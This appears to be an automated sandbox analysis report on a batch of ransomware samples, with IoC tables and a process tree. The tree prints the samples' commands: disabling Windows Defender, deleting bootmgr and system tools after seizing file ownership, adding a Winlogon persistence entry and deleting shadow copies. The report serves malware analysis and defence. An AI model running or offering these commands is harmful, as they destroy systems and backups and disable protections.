Token: SeBackupPrivilege	2796	WMIC.exe
Token: SeRestorePrivilege	2796	WMIC.exe
Token: SeShutdownPrivilege	2796	WMIC.exe
Token: SeDebugPrivilege	2796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2796	WMIC.exe
Token: SeRemoteShutdownPrivilege	2796	WMIC.exe
Token: SeUndockPrivilege	2796	WMIC.exe
Token: SeManageVolumePrivilege	2796	WMIC.exe
Token: 33	2796	WMIC.exe
Token: 34	2796	WMIC.exe
Token: 35	2796	WMIC.exe
Token: 36	2796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2280	powershell.exe
Token: SeSecurityPrivilege	2280	powershell.exe
Token: SeTakeOwnershipPrivilege	2280	powershell.exe
Token: SeLoadDriverPrivilege	2280	powershell.exe
Token: SeSystemProfilePrivilege	2280	powershell.exe
Token: SeSystemtimePrivilege	2280	powershell.exe
Token: SeProfSingleProcessPrivilege	2280	powershell.exe
Token: SeIncBasePriorityPrivilege	2280	powershell.exe
Token: SeCreatePagefilePrivilege	2280	powershell.exe
Token: SeBackupPrivilege	2280	powershell.exe
Token: SeRestorePrivilege	2280	powershell.exe
Token: SeShutdownPrivilege	2280	powershell.exe
Token: SeDebugPrivilege	2280	powershell.exe
Token: SeSystemEnvironmentPrivilege	2280	powershell.exe
Token: SeRemoteShutdownPrivilege	2280	powershell.exe
Token: SeUndockPrivilege	2280	powershell.exe
Token: SeManageVolumePrivilege	2280	powershell.exe
Token: 33	2280	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

7zFM.exetaskmgr.exetaskmgr.exe

pid	process
376	7zFM.exe
376	7zFM.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exetaskmgr.exe

pid	process
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
4808	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe
2712	taskmgr.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

OpenWith.execmd.exe

pid process

4276 OpenWith.exe
1956 cmd.exe

pid	process
4276	OpenWith.exe
1956	cmd.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

taskmgr.exepowershell.execmd.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exeHEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exeHEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.execmd.exe

description	pid	process	target process
PID 4808 wrote to memory of 2712	4808	taskmgr.exe	taskmgr.exe
PID 4808 wrote to memory of 2712	4808	taskmgr.exe	taskmgr.exe
PID 1768 wrote to memory of 1956	1768	powershell.exe	cmd.exe
PID 1768 wrote to memory of 1956	1768	powershell.exe	cmd.exe
PID 1956 wrote to memory of 2684	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
PID 1956 wrote to memory of 2684	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
PID 1956 wrote to memory of 2588	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
PID 1956 wrote to memory of 2588	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
PID 1956 wrote to memory of 2588	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
PID 1956 wrote to memory of 384	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
PID 1956 wrote to memory of 384	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
PID 1956 wrote to memory of 4532	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
PID 1956 wrote to memory of 4532	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
PID 1956 wrote to memory of 4532	1956	cmd.exe	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
PID 1956 wrote to memory of 2524	1956	cmd.exe	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
PID 1956 wrote to memory of 2524	1956	cmd.exe	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
PID 2684 wrote to memory of 4244	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2684 wrote to memory of 4244	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2684 wrote to memory of 3160	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2684 wrote to memory of 3160	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2524 wrote to memory of 3800	2524	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
PID 2524 wrote to memory of 3800	2524	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
PID 2684 wrote to memory of 2900	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2684 wrote to memory of 2900	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2684 wrote to memory of 2564	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 2684 wrote to memory of 2564	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	powershell.exe
PID 1956 wrote to memory of 5112	1956	cmd.exe	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
PID 1956 wrote to memory of 5112	1956	cmd.exe	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
PID 2684 wrote to memory of 5048	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	VSSVC.exe
PID 2684 wrote to memory of 5048	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	VSSVC.exe
PID 2684 wrote to memory of 5048	2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	VSSVC.exe
PID 4532 wrote to memory of 2280	4532	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe	powershell.exe
PID 4532 wrote to memory of 2280	4532	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe	powershell.exe
PID 4532 wrote to memory of 2280	4532	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe	powershell.exe
PID 1956 wrote to memory of 5152	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe
PID 1956 wrote to memory of 5152	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe
PID 1956 wrote to memory of 5152	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe
PID 5152 wrote to memory of 4016	5152	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe	zbhnd.exe
PID 5152 wrote to memory of 4016	5152	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe	zbhnd.exe
PID 5152 wrote to memory of 4016	5152	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe	zbhnd.exe
PID 1956 wrote to memory of 5892	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-b7549a6bb57efedcb6b536da95fb3c06505f54fb459188d7ea5862794f9cf2be.exe
PID 1956 wrote to memory of 5892	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-b7549a6bb57efedcb6b536da95fb3c06505f54fb459188d7ea5862794f9cf2be.exe
PID 5112 wrote to memory of 5764	5112	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
PID 5112 wrote to memory of 5764	5112	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
PID 1956 wrote to memory of 5164	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe
PID 1956 wrote to memory of 5164	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe
PID 1956 wrote to memory of 5144	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe
PID 1956 wrote to memory of 5144	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe
PID 1956 wrote to memory of 5144	1956	cmd.exe	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe
PID 5144 wrote to memory of 5672	5144	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe	cmd.exe
PID 5144 wrote to memory of 5672	5144	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe	cmd.exe
PID 2588 wrote to memory of 768	2588	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe	cmd.exe
PID 2588 wrote to memory of 768	2588	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe	cmd.exe
PID 2588 wrote to memory of 768	2588	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe	cmd.exe
PID 5672 wrote to memory of 2796	5672	cmd.exe	WMIC.exe
PID 5672 wrote to memory of 2796	5672	cmd.exe	WMIC.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00469.7z
1⤵
- Modifies registry class
PID:3716

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4276

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3244

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00469.7z"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:376

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1956
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
    HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:4244
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:3160
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting Disable
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2564
  - - C:\Users\Admin\AppData\Local\Temp\VSSVC.exe
      "C:\Users\Admin\AppData\Local\Temp\VSSVC.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      PID:5048
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && takeown /f C:\Windows\System32\shutdown.exe && icacls C:\Windows\System32\shutdown.exe /grant %username%:F && del C:\Windows\System32\shutdown.exe && Exit
        5⤵
        
        PID:9824
      - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\System32
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6192
      - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\System32 /grant Admin:F
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9636
      - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\System32\drivers
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:9588
      - C:\Windows\SysWOW64\icacls.exe
        
        icacls C:\Windows\System32\drivers /grant Admin:F
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6628
      - C:\Windows\SysWOW64\takeown.exe
        
        takeown /f C:\Windows\System32\LogonUI.exe
        6⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:8344
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2588
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Update.exe,"
      4⤵
      System Location Discovery: System Language Discovery
      PID:768
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\Microsoft\Update.exe,"
        5⤵
        
        PID:4384
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Update.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Update.exe"
      4⤵
      PID:1940
    - - C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"
        5⤵
        
        PID:10184
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:7964
      - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        6⤵
        
        PID:8036
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:384
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4532
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2280
  - - C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
      C:\Users\Admin\AppData\Local\Temp\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
      4⤵
      PID:6020
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6020 -s 2004
        5⤵
        Program crash
        
        PID:1596
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
    HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2524
  - - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
      HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops desktop.ini file(s)
      Drops file in Program Files directory
      PID:3800
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
    HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5112
  - - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
      HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5764
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe
    HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5152
  - - C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
      "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4016
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-b7549a6bb57efedcb6b536da95fb3c06505f54fb459188d7ea5862794f9cf2be.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-b7549a6bb57efedcb6b536da95fb3c06505f54fb459188d7ea5862794f9cf2be.exe
    3⤵
    - Executes dropped EXE
    PID:5892
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe
    HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:5164
- - C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe
    HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5144
  - - C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c C:\Windows\System32\wbem\WMIC.exe shadowcopy where "ID='{9B1C0B51-DF9F-4F59-949C-517E6288FE02}'" delete
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5672
